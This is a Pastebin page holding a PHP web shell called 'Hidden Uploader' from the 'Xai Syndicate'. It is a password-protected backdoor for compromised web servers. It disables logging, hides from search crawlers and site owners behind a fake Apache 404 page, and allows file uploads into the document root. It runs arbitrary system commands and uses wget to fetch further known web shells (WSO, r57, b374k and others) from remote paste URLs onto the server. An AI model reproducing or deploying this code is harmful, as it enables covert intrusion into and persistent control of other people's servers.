API tools faq
paste
Advertisement
mrandraz404

Hidden Uploder (xai)

mrandraz404
Apr 1st, 2017
45
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.80 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $auth_pass = "2ed348e96478fc3e4b88bcfb1882f684"; //
  3. session_start();
  4. error_reporting(0);
  5. set_time_limit(0);
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14. if(isset($_GET['show'])){
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22. header('HTTP/1.0 404 Not Found');
  23. exit;
  24. }
  25. }
  26.  
  27. function login_shell() {
  28. ?>
  29. <html>
  30. <head>
  31. <title>Xai Syndicate</title>
  32. <style type="text/css">
  33. html {
  34. background: #000000;
  35. color: green;
  36. }
  37. header {
  38. color: green;
  39. margin: 10px auto;
  40. }
  41. input[type=password] {
  42. width: 250px;
  43. height: 25px;
  44. color: red;
  45. background: #000000;
  46. border: 1px solid #ffffff;
  47. padding: 5px;
  48. margin-left: 20px;
  49. text-align: center;
  50. }
  51. </style>
  52. </head>
  53. <header>
  54. <center><img src="http://i.imgur.com/fW1hCGC.png" width="30%" height="50%"></img></center>
  55. </header>
  56. <form method="post">
  57. <center><input type="password" name="pass"><center>
  58. </form>
  59. <?php
  60. exit;
  61.  
  62. }
  63. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  64. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  65. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  66. else
  67. login_shell();
  68. ?>
  69. <html>
  70. <head>
  71. <title>$Hidden Uploader$</title>
  72. <style type='text/css'>
  73. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  74. html {
  75. background-color: black;
  76. color: white;
  77. font-size: 13px;
  78. }
  79. a{
  80. color:red;
  81. text-decoration: none;
  82. }
  83. textarea{
  84. backgroud-color:#333333;
  85. color: white;
  86. }
  87. table, th, td {
  88. border-collapse:collapse;
  89. font-family: Tahoma, Geneva, sans-serif;
  90. background: transparent;
  91. font-family: 'Ubuntu';
  92. font-size: 13px;
  93. }
  94. select{
  95. border: 1px white solid;
  96. -moz-border-radius: 5px;
  97. -webkit-border-radius:5px;
  98. border-radius:5px;
  99. }
  100. input[type=submit] {
  101. background: transparent;
  102. color: #ffffff;
  103. height: 24px;
  104. border: 1px solid #ffffff;
  105. margin: 5px auto;
  106. padding-left: 5px;
  107. font-family: 'Ubuntu';
  108. font-size: 13px;
  109. }
  110. </style>
  111. </head>
  112. <center>
  113. <img src="https://media.giphy.com/media/26gsvp8v9bZCLhiOQ/source.gif" width="200px" height="270px"><br>
  114. <font color='white' size="6">$</font><font color='blue' size="8">Hidden Uploader</font><font color='white' size="6">$</font><br>
  115. <body bgcolor="black">
  116. <?php
  117. function w($dir,$perm) {
  118. if(!is_writable($dir)) {
  119. return "<font color=red>".$perm."</font>";
  120. } else {
  121. return "<font color=green>".$perm."</font>";
  122. }
  123. }
  124. function exe($cmd) {
  125. if(function_exists('system')) {
  126. @ob_start();
  127. @system($cmd);
  128. $buff = @ob_get_contents();
  129. @ob_end_clean();
  130. return $buff;
  131. } elseif(function_exists('exec')) {
  132. @exec($cmd,$results);
  133. $buff = "";
  134. foreach($results as $result) {
  135. $buff .= $result;
  136. } return $buff;
  137. } elseif(function_exists('passthru')) {
  138. @ob_start();
  139. @passthru($cmd);
  140. $buff = @ob_get_contents();
  141. @ob_end_clean();
  142. return $buff;
  143. } elseif(function_exists('shell_exec')) {
  144. $buff = @shell_exec($cmd);
  145. return $buff;
  146. }
  147. }
  148. function sulap($text) {
  149. if(!get_magic_quotes_gpc()) {
  150. return $text;
  151. }
  152. return stripslashes($text);
  153. }
  154. function ambilKata($param, $kata1, $kata2){
  155. if(strpos($param, $kata1) === FALSE) return FALSE;
  156. if(strpos($param, $kata2) === FALSE) return FALSE;
  157. $start = strpos($param, $kata1) + strlen($kata1);
  158. $end = strpos($param, $kata2, $start);
  159. $return = substr($param, $start, $end - $start);
  160. return $return;
  161. }
  162. function perms($file){
  163. $perms = fileperms($file);
  164. if (($perms & 0xC000) == 0xC000) {
  165. // Socket
  166. $info = 's';
  167. } elseif (($perms & 0xA000) == 0xA000) {
  168. // Symbolic Link
  169. $info = 'l';
  170. } elseif (($perms & 0x8000) == 0x8000) {
  171. // Regular
  172. $info = '-';
  173. } elseif (($perms & 0x6000) == 0x6000) {
  174. // Block special
  175. $info = 'b';
  176. } elseif (($perms & 0x4000) == 0x4000) {
  177. // Directory
  178. $info = 'd';
  179. } elseif (($perms & 0x2000) == 0x2000) {
  180. // Character special
  181. $info = 'c';
  182. } elseif (($perms & 0x1000) == 0x1000) {
  183. // FIFO pipe
  184. $info = 'p';
  185. } else {
  186. // Unknown
  187. $info = 'u';
  188. }
  189.  
  190. // Owner
  191. $info .= (($perms & 0x0100) ? 'r' : '-');
  192. $info .= (($perms & 0x0080) ? 'w' : '-');
  193. $info .= (($perms & 0x0040) ?
  194. (($perms & 0x0800) ? 's' : 'x' ) :
  195. (($perms & 0x0800) ? 'S' : '-'));
  196.  
  197. // Group
  198. $info .= (($perms & 0x0020) ? 'r' : '-');
  199. $info .= (($perms & 0x0010) ? 'w' : '-');
  200. $info .= (($perms & 0x0008) ?
  201. (($perms & 0x0400) ? 's' : 'x' ) :
  202. (($perms & 0x0400) ? 'S' : '-'));
  203.  
  204. // World
  205. $info .= (($perms & 0x0004) ? 'r' : '-');
  206. $info .= (($perms & 0x0002) ? 'w' : '-');
  207. $info .= (($perms & 0x0001) ?
  208. (($perms & 0x0200) ? 't' : 'x' ) :
  209. (($perms & 0x0200) ? 'T' : '-'));
  210.  
  211. return $info;
  212. }
  213. error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
  214. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  215. echo "<b><font color='green'><br>Server IP : ".gethostbyname($_SERVER['HTTP_HOST'])."</b></font>";
  216. echo "<b><font color='green'><br>".php_uname()."</b></font><br>";
  217. echo "<b><font color='green'>Disable Functions: $show_ds</b></font><br><br>";
  218. echo "&nbsp;<a href='?show' style='border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>H O M E</a>&nbsp;<a href='?c7e=kill' style='border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>K I L L </a>&nbsp;<a href='?bye=logout' style='color:red;border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>L O G O U T</a>";
  219. echo "<form method='post' enctype='multipart/form-data'>
  220. <input type='file' name='file'>
  221. <input type='submit' value='upload' name='upload'>
  222. </form>";
  223. $root = $_SERVER['DOCUMENT_ROOT'];
  224. $files = $_FILES['file']['name'];
  225. $dest = $root.'/'.$files;
  226. if(isset($_POST['upload'])) {
  227. if(is_writable($root)) {
  228. if(@copy($_FILES['file']['tmp_name'], $dest)) {
  229. $web = "http://".$_SERVER['HTTP_HOST']."/";
  230. echo "sukses upload -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  231. } else {
  232. echo "gagal upload di document root.";
  233. }
  234. } else {
  235. if(@copy($_FILES['file']['tmp_name'], $files)) {
  236. echo "sukses upload <b>$files</b> di folder ini";
  237. } else {
  238. echo "gagal upload";
  239. }
  240. }
  241. }
  242. echo"<table align=center>";
  243. echo"<td>";
  244. echo"<form method='post'> ";
  245. echo"<select name='shell' style=padding:5px 10px;>";
  246. echo"<option selected'> Shell Creator </option>";
  247. echo"<option value='wso'> WSO Shell </option>";
  248. echo"<option value='idx'> IDX Shell </option>";
  249. echo"<option value='r57'> R57 Shell </option>";
  250. echo"<option value='b374k'> B374K Shell </option>";
  251. echo"<option value='sadrazam'> Sadrazam Shell </option>";
  252. echo"<option value='blackhat'> BlackHat Shell </option>";
  253. echo"<option value='noname'> Noname Shell </option>";
  254. echo "</select>";
  255. echo"&nbsp;<input type='submit' class='btn btn-success btn-sm' name='enter' value='Submit!'>";
  256. if(isset($_POST['enter'])) {
  257. if ($_POST['lucknut'] == 'wso_shell') {
  258. $exec=exec('wget http://pastebin.com/raw.php?i=Tpm5E10g -O wsoshell.php');
  259. if(file_exists('./wsoshell.php')){
  260. echo '<center><a href=./wsoshell.php target="_blank"> wso.php </a> upload sukses !</center>';
  261. } else {
  262. echo '<center>gagal upload !</center>';
  263. }
  264. }elseif($_POST['shell'] == 'idx') {
  265. $exec=exec('wget http://pastebin.com/raw.php?i=nC6pWh5a -O idx.php');
  266. if(file_exists('./idx.php')){
  267. echo '<center><a href=./idx.php target="_blank"> idx.php </a> upload sukses !</center>';
  268. } else {
  269. echo '<center>Failed!</center>';
  270. }
  271. }elseif($_POST['shell'] == 'r57') {
  272. $exec=exec('wget http://pastebin.com/raw.php?i=S9tzBgg3 -O r57.php');
  273. if(file_exists('./r57.php')){
  274. echo '<center><a href=./r57.php target="_blank"> r57.php </a> upload sukses !</center>';
  275. } else {
  276. echo '<center>Failed!</center>';
  277. }
  278. }elseif($_POST['shell'] == 'wso') {
  279. $exec=exec('wget http://pastebin.com/raw.php?i=N0eh3Q7Y -O wso.php');
  280. if(file_exists('./wsp.php')){
  281. echo '<center><a href=./wso.php target="_blank"> wso.php </a> upload sukses !</center>';
  282. } else {
  283. echo '<center>Failed!</center>';
  284. }
  285. }elseif($_POST['shell'] == 'b374k') {
  286. $exec=exec('wget http://pastebin.com/raw.php?i=cR71LiMp -O b374k.php');
  287. if(file_exists('./b374k.php')){
  288. echo '<center><a href=./b374k.php target="_blank"> b374k.php </a> upload sukses !</center>';
  289. } else {
  290. echo '<center>Failed!</center>';
  291. }
  292. }elseif($_POST['shell'] == 'sadrazam') {
  293. $exec=exec('wget http://pastebin.com/raw.php?i=xjKrnnBD -O sadrazam.php');
  294. if(file_exists('./sadrazam.php')){
  295. echo '<center><a href=./sadrazam.php target="_blank"> sadrazam.php </a> upload sukses !</center>';
  296. } else {
  297. echo '<center>Failed!</center>';
  298. }
  299. }elseif($_POST['shell'] == 'blackhat') {
  300. $exec=exec('wget http://pastebin.com/raw.php?i=3L2ESWeu -O bh.php');
  301. if(file_exists('./bh.php')){
  302. echo '<center><a href=./bh.php target="_blank"> bh.php </a> upload sukses !</center>';
  303. } else {
  304. echo '<center>Failed!</center>';
  305. }
  306. }elseif($_POST['shell'] == 'noname') {
  307. $exec=exec('wget http://pastebin.com/raw.php?i=BRCmf02c -O noname.php');
  308. if(file_exists('./noname.php')){
  309. echo '<center><a href=./noname.php target="_blank"> noname.php </a> upload sukses !</center>';
  310. } else {
  311. echo '<center>Failed!</center>';
  312. }
  313. }
  314. }
  315. }
  316. elseif($_GET['bye'] == 'logout') {
  317.  
  318.  
  319. echo '<form action="?show&bye=logout" method="post">';
  320. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  321. echo 'Good Bye!!';
  322. }
  323. elseif($_GET['c7e'] == 'kill') {
  324. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  325. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  326. else
  327. echo '<center>unlink failed!</center>';
  328. }
  329. else{
  330. echo "<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
  331. <HTML><HEAD>
  332. <TITLE>404 Not Found</TITLE>
  333. </HEAD><BODY>
  334.  
  335. <h1>Not Found</h1>
  336.  
  337. The requested URL ";
  338. echo $_SERVER['REQUEST_URI'];
  339. echo "
  340. was not found on this server.
  341. <hr>
  342.  
  343. ";
  344. echo "<address>Apache Server at ".$_SERVER['HTTP_HOST']." Port 80</address>";
  345. }
  346. ?>
  347. </center>
  348. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!